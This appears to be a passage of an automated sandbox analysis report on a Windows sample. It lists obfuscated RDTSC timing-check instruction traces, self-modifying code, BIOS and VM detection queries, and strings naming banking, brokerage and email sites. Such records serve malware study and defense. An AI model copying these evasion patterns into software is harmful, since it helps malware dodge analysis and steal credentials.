0x0000005a xchg eax, ebp 0x0000005b pushad 0x0000005c mov esi, 250C7C4Bh 0x00000061 mov bx, cx 0x00000064 popad 0x00000065 mov ebp, esp 0x00000067 push eax 0x00000068 push edx 0x00000069 pushad 0x0000006a call 00007F9F112ED79Fh 0x0000006f pop eax 0x00000070 pushfd 0x00000071 jmp 00007F9F112ED7A9h 0x00000076 jmp 00007F9F112ED79Bh 0x0000007b popfd 0x0000007c popad 0x0000007d rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 558008F second address: 55800EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F9F10525BFFh 0x00000009 sbb eax, 2C8F7D7Eh 0x0000000f jmp 00007F9F10525C09h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007F9F10525C00h 0x0000001b sbb ax, 6878h 0x00000020 jmp 00007F9F10525BFBh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 sub esp, 2Ch 0x0000002c pushad 0x0000002d push eax 0x0000002e push edx 0x0000002f mov ch, 9Ah 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 55800EF second address: 5580143 instructions: 0x00000000 rdtsc 0x00000002 mov di, BEF2h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushfd 0x00000009 jmp 00007F9F112ED7A3h 0x0000000e sbb ah, FFFFFFEEh 0x00000011 jmp 00007F9F112ED7A9h 0x00000016 popfd 0x00000017 popad 0x00000018 xchg eax, ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c jmp 00007F9F112ED7A3h 0x00000021 pushad 0x00000022 popad 0x00000023 popad 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5580143 second address: 558016D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F10525BFFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F9F10525C04h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 558016D second address: 5580187 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9F112ED79Dh 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5580187 second address: 558018D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 558018D second address: 55801F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, 4217h 0x00000007 pushfd 0x00000008 jmp 00007F9F112ED79Ch 0x0000000d adc esi, 4E69FB88h 0x00000013 jmp 00007F9F112ED79Bh 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, edi 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007F9F112ED79Bh 0x00000026 or ch, FFFFFFCEh 0x00000029 jmp 00007F9F112ED7A9h 0x0000002e popfd 0x0000002f jmp 00007F9F112ED7A0h 0x00000034 popad 0x00000035 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 55801F4 second address: 55801FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5580287 second address: 55802B8 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F9F112ED7A1h 0x00000008 sub si, 5036h 0x0000000d jmp 00007F9F112ED7A1h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 mov ebx, ecx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 55802B8 second address: 5580312 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F9F10525BFAh 0x00000008 or ax, 5F58h 0x0000000d jmp 00007F9F10525BFBh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 inc ebx 0x00000017 jmp 00007F9F10525C06h 0x0000001c test al, al 0x0000001e pushad 0x0000001f call 00007F9F10525BFEh 0x00000024 movzx eax, bx 0x00000027 pop edx 0x00000028 push eax 0x00000029 push edx 0x0000002a call 00007F9F10525BFAh 0x0000002f pop esi 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5580508 second address: 558050D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 558050D second address: 558051C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9F10525BFBh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 558051C second address: 5580542 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, dword ptr [ebp+08h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F9F112ED7A7h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5580542 second address: 558055F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F10525C09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 558055F second address: 558056F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9F112ED79Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 558056F second address: 5580573 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5580573 second address: 558058B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebp-2Ch] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov esi, 108D3EDFh 0x00000013 mov si, E9FBh 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 558058B second address: 55805E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 067555E2h 0x00000008 jmp 00007F9F10525C03h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 xchg eax, esi 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F9F10525C04h 0x00000018 or cx, 2BA8h 0x0000001d jmp 00007F9F10525BFBh 0x00000022 popfd 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F9F10525C06h 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 55805E9 second address: 558062A instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F9F112ED7A2h 0x00000008 sbb eax, 47E59938h 0x0000000e jmp 00007F9F112ED79Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F9F112ED7A4h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 558062A second address: 5580630 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5580630 second address: 558063F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 558063F second address: 5580645 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5580645 second address: 5580696 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F9F112ED7A3h 0x00000008 pop eax 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 call 00007F9F112ED7A7h 0x00000015 pop esi 0x00000016 call 00007F9F112ED7A9h 0x0000001b pop ecx 0x0000001c popad 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5580696 second address: 55806CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F10525BFEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F9F10525BFCh 0x00000013 sbb esi, 6656DD18h 0x00000019 jmp 00007F9F10525BFBh 0x0000001e popfd 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 55806CD second address: 55806D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 55806D2 second address: 55806FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9F10525C05h 0x00000008 mov ebx, ecx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e jmp 00007F9F10525BFAh 0x00000013 xchg eax, ebx 0x00000014 pushad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5580769 second address: 558077B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9F112ED79Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 558077B second address: 5570E9A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F10525BFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test esi, esi 0x0000000d jmp 00007F9F10525C06h 0x00000012 je 00007F9F81BD3AA7h 0x00000018 xor eax, eax 0x0000001a jmp 00007F9F104FF32Ah 0x0000001f pop esi 0x00000020 pop edi 0x00000021 pop ebx 0x00000022 leave 0x00000023 retn 0004h 0x00000026 nop 0x00000027 sub esp, 04h 0x0000002a mov esi, eax 0x0000002c xor ebx, ebx 0x0000002e cmp esi, 00000000h 0x00000031 je 00007F9F10525D35h 0x00000037 call 00007F9F14E32AB5h 0x0000003c mov edi, edi 0x0000003e jmp 00007F9F10525C05h 0x00000043 xchg eax, ebp 0x00000044 pushad 0x00000045 mov ax, D2F3h 0x00000049 push eax 0x0000004a push edx 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5570E9A second address: 5570E9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5570E9E second address: 5570F15 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F10525C04h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007F9F10525BFBh 0x00000010 xchg eax, ebp 0x00000011 pushad 0x00000012 mov al, 3Dh 0x00000014 jmp 00007F9F10525C01h 0x00000019 popad 0x0000001a mov ebp, esp 0x0000001c pushad 0x0000001d mov dh, cl 0x0000001f mov si, di 0x00000022 popad 0x00000023 push ebp 0x00000024 pushad 0x00000025 movzx esi, bx 0x00000028 jmp 00007F9F10525C03h 0x0000002d popad 0x0000002e mov dword ptr [esp], ecx 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F9F10525C05h 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5570F15 second address: 5570F1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5570F1B second address: 5570F1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5580BCD second address: 5580BD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5580BD1 second address: 5580BD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5580BD7 second address: 5580BDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5580BDD second address: 5580BE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5580BE1 second address: 5580C0F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F112ED79Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F9F112ED7A7h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5580C0F second address: 5580C27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9F10525C04h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5580C27 second address: 5580C2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5580C2B second address: 5580CA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F9F10525BFEh 0x0000000e xchg eax, ebp 0x0000000f jmp 00007F9F10525C00h 0x00000014 mov ebp, esp 0x00000016 jmp 00007F9F10525C00h 0x0000001b cmp dword ptr [76C8459Ch], 05h 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 mov ax, dx 0x00000028 pushfd 0x00000029 jmp 00007F9F10525C09h 0x0000002e adc ch, 00000046h 0x00000031 jmp 00007F9F10525C01h 0x00000036 popfd 0x00000037 popad 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5580D49 second address: 5580D90 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F9F112ED79Dh 0x00000008 sub eax, 6CB3D326h 0x0000000e jmp 00007F9F112ED7A1h 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 push eax 0x00000018 jmp 00007F9F112ED7A1h 0x0000001d mov eax, dword ptr [esp+04h] 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5580D90 second address: 5580D94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5580D94 second address: 5580DAE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F112ED7A6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5580DAE second address: 5580DEA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F9F10525BFDh 0x00000009 adc esi, 6AF3C496h 0x0000000f jmp 00007F9F10525C01h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov eax, dword ptr [eax] 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F9F10525BFCh 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5580DEA second address: 5580DF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5580DF0 second address: 5580DF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5580DF4 second address: 5580DF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5580DF8 second address: 5580E41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c pushad 0x0000000d call 00007F9F10525C06h 0x00000012 push eax 0x00000013 pop ebx 0x00000014 pop eax 0x00000015 jmp 00007F9F10525C07h 0x0000001a popad 0x0000001b pop eax 0x0000001c pushad 0x0000001d mov ax, 7ADBh 0x00000021 push eax 0x00000022 push edx 0x00000023 mov bx, cx 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5580E41 second address: 5580E87 instructions: 0x00000000 rdtsc 0x00000002 mov edi, esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 call 00007F9F829924C0h 0x0000000c push 76C22B70h 0x00000011 push dword ptr fs:[00000000h] 0x00000018 mov eax, dword ptr [esp+10h] 0x0000001c mov dword ptr [esp+10h], ebp 0x00000020 lea ebp, dword ptr [esp+10h] 0x00000024 sub esp, eax 0x00000026 push ebx 0x00000027 push esi 0x00000028 push edi 0x00000029 mov eax, dword ptr [76C84538h] 0x0000002e xor dword ptr [ebp-04h], eax 0x00000031 xor eax, ebp 0x00000033 push eax 0x00000034 mov dword ptr [ebp-18h], esp 0x00000037 push dword ptr [ebp-08h] 0x0000003a mov eax, dword ptr [ebp-04h] 0x0000003d mov dword ptr [ebp-04h], FFFFFFFEh 0x00000044 mov dword ptr [ebp-08h], eax 0x00000047 lea eax, dword ptr [ebp-10h] 0x0000004a mov dword ptr fs:[00000000h], eax 0x00000050 ret 0x00000051 push eax 0x00000052 push edx 0x00000053 pushad 0x00000054 pushfd 0x00000055 jmp 00007F9F112ED7A1h 0x0000005a jmp 00007F9F112ED79Bh 0x0000005f popfd 0x00000060 jmp 00007F9F112ED7A8h 0x00000065 popad 0x00000066 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5580E87 second address: 5580E99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9F10525BFEh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5580E99 second address: 5580E9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5580E9D second address: 5580EE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, 00000000h 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F9F10525BFAh 0x00000014 sub si, 1898h 0x00000019 jmp 00007F9F10525BFBh 0x0000001e popfd 0x0000001f push eax 0x00000020 push edx 0x00000021 call 00007F9F10525C06h 0x00000026 pop ecx 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5580EE0 second address: 5580EFC instructions: 0x00000000 rdtsc 0x00000002 call 00007F9F112ED79Bh 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [ebp-1Ch], esi 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov ah, C6h 0x00000013 mov ecx, edi 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5580EFC second address: 5580F02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5580F02 second address: 5580F06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5580F3A second address: 5580FA5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F9F10525BFFh 0x00000008 pop eax 0x00000009 mov dx, FF2Ch 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 test al, al 0x00000012 jmp 00007F9F10525BFBh 0x00000017 je 00007F9F81BB961Ah 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 push edi 0x00000021 pop eax 0x00000022 pushfd 0x00000023 jmp 00007F9F10525C07h 0x00000028 adc ecx, 7EEA738Eh 0x0000002e jmp 00007F9F10525C09h 0x00000033 popfd 0x00000034 popad 0x00000035 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5590B0A second address: 5590B0F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5590B0F second address: 5590B3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebp 0x00000008 jmp 00007F9F10525BFAh 0x0000000d mov ebp, esp 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F9F10525C07h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5590B3C second address: 5590B54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9F112ED7A4h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5590B54 second address: 5590B77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F9F10525C06h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5590B77 second address: 5590B86 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F112ED79Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5590D2F second address: 5590D33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5590D33 second address: 5590D39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe Special instruction interceptor: First address: E323D3 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe Special instruction interceptor: First address: C864D6 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe Special instruction interceptor: First address: E5CF37 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe Special instruction interceptor: First address: C88A46 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe TID: 7824 Thread sleep time: -180000s >= -30000s
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe TID: 7868 Thread sleep time: -30000s >= -30000s
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: fer4JIJGeL.exe, 00000000.00000002.1620112958.0000000000E14000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: fer4JIJGeL.exe, 00000000.00000003.1489074088.0000000006003000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: - GDCDYNVMware20,11696494690p
                Source: fer4JIJGeL.exe, 00000000.00000003.1489074088.0000000005FFE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696494690
                Source: fer4JIJGeL.exe, 00000000.00000003.1489074088.0000000005FFE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696494690f
                Source: fer4JIJGeL.exe, 00000000.00000003.1489074088.0000000005FFE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696494690
                Source: fer4JIJGeL.exe, 00000000.00000003.1489074088.0000000005FFE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696494690s
                Source: fer4JIJGeL.exe, 00000000.00000003.1489074088.0000000005FFE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                Source: fer4JIJGeL.exe, 00000000.00000003.1489074088.0000000005FFE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                Source: fer4JIJGeL.exe, 00000000.00000003.1489074088.0000000005FFE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                Source: fer4JIJGeL.exe, 00000000.00000003.1489074088.0000000005FFE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696494690
                Source: fer4JIJGeL.exe, 00000000.00000003.1489074088.0000000005FFE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
                Source: fer4JIJGeL.exe, 00000000.00000003.1489074088.0000000005FFE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
